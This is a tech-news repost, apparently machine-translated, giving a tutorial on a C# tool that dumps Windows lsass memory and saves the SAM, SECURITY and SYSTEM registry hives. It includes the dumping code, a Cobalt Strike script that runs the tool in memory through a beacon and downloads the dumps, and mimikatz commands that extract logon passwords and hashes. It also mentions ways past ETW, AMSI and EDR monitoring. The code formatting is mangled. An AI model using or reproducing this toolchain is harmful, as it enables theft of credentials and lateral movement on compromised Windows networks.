Shulou(Shulou.com)06/03 Report--

In this issue, the editor will bring you about the lsass memory and sam registry of the C# dump system. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

1. Test permission

Because the dump system lsass memory and the sam registry require administrator permissions, you first need to determine the current process context permissions.

Public static bool IsHighIntegrity () {/ / returns true if the current process is running with adminstrative privs in a high integrity context var identity = WindowsIdentity.GetCurrent (); var principal = new WindowsPrincipal (identity); return principal.IsInRole (WindowsBuiltInRole.Administrator);} 2, lsass memory

MiniDumpWriteDump is an API in MS DbgHelp.dll, which is used to export the Dump of the currently running program. MiniDumpWriteDump is used to realize the function of dump lsass memory, and the MiniDumpWriteDump function is loaded first.

[DllImport ("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)] public static extern bool MiniDumpWriteDump (IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam)

Then call the function and save the dump file, as shown in the following code:

Namespace sharpdump {public class MiniDumper {public static string MiniDump () {Process [] pLsass = Process.GetProcessesByName ("lsass"); string dumpFile = Path.Combine (Path.GetTempPath (), string.Format ("lsass {0} .dmp", pLsass [0] .ID)); if (File.Exists (dumpFile)) File.Delete (dumpFile) Console.WriteLine (String.Format ("[*] Dumping lsass ({0}) to {1}", pLsass [0] .ID, dumpFile)); using (FileStream fs = new FileStream (dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)) {bool bRet = MiniDumpWriteDump (pLsass [0] .handle, (uint) pLsass [0] .ID, fs.SafeFileHandle, (uint) 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero) If (bRet) {Console.WriteLine ("[+] Dump successful!"); return dumpFile;} else {Console.WriteLine (String.Format ("[X] Dump Failed! ErrorCode: {0} ", Marshal.GetLastWin32Error ()); return null;}} 3. Implement reg save to save the sam registry

First import the API that you need to use.

[DllImport ("advapi32.dll", CharSet = CharSet.Auto)] public static extern int RegOpenKeyEx (UIntPtr hKey, string subKey, int ulOptions, int samDesired, out UIntPtr hkResult) [DllImport ("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern int RegSaveKey (UIntPtr hKey, string lpFile, IntPtr lpSecurityAttributes); [DllImport ("advapi32.dll", SetLastError = true)] public static extern int RegCloseKey (UIntPtr hKey)

Then build the function to reg save the "SAM", "SECURITY", "SYSTEM" registries.

Namespace sharpdump {internal class Reg {public static UIntPtr HKEY_LOCAL_MACHINE = new UIntPtr (0x80000002u); public static int KEY_READ = 0x20019; public static int KEY_ALL_ACCESS = 0xF003F; public static int REG_OPTION_OPEN_LINK = 0x0008; public static int REG_OPTION_BACKUP_RESTORE = 0x0004; public static int KEY_QUERY_VALUE = 0x1 Public static void ExportRegKey (string key, string outFile) {var hKey = UIntPtr.Zero; try {RegOpenKeyEx (HKEY_LOCAL_MACHINE, key, REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_ALL_ACCESS, out hKey) / / https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa RegSaveKey (hKey, outFile, IntPtr.Zero); RegCloseKey (hKey); Console.WriteLine ("Exported HKLM\ {0} at {1}", key, outFile);} catch (Exception e) {throw e }} public static string DumpReg (string key) {try {String addr = key + ".HIV"; addr = Path.Combine (Path.GetTempPath (), addr); ExportRegKey (key, addr); return addr } catch (Exception e) {Console.WriteLine (e.Message); Console.WriteLine (e.StackTrace); return ";}

The files will be dump to the temp directory, and then all the successful dump files will be packaged for easy download. The complete code will be uploaded to knowledge Planet later.

4. About ExecuteAssembly

ExecuteAssembly is an alternative to CS executable components. ExecuteAssembly is built based on C _ Candrel +, which can help researchers to load and inject .NET assemblies.

ExecuteAssembly reuses the host process spawnto to load the CLR module / AppDomainManager,Stomping loader / .NET assembly PE DOS header and unloads the .NET related modules for ETW+AMSI bypass. In addition, it can bypass EDR hooks based on NT static system calls and implement hidden imports by dynamically parsing API (superfasthash hash algorithm).

At present, both metasploit-framework and Cobalt Strike have realized the function of ExecuteAssembly. The following is mainly to take Cobalt Strike as an example to realize the functions of lsass memory and sam registry of dump system.

5. CS plug-in

Take Cobalt Strike as an example, write a simple cna script.

Popup beacon_bottom {menu "Dumper" {item "SharpDump" {local ('$bid'); foreach $bid ($1) {bexecute_assembly ($1, script_resource ("Dumper.exe"));}} item "DownloadDump" {prompt_text ("File's address to download", "", lambda ({bdownload (@ ids, $1)) }, @ ids = > $1);}

After loading the script, execute SharpDump, and the result is as follows:

Download the dump.gz stored in the temp directory, then use Decompress to extract it, and finally use mimikatz to decrypt the user lsass.dmp and sam files

Mimikatz.exe "sekurlsa::minidump lsass.dmp"sekurlsa::logonPasswords full" exit lsadump::sam / sam:sam.hiv / system:system.hiv above is the C# dump system lsass memory and sam registry shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.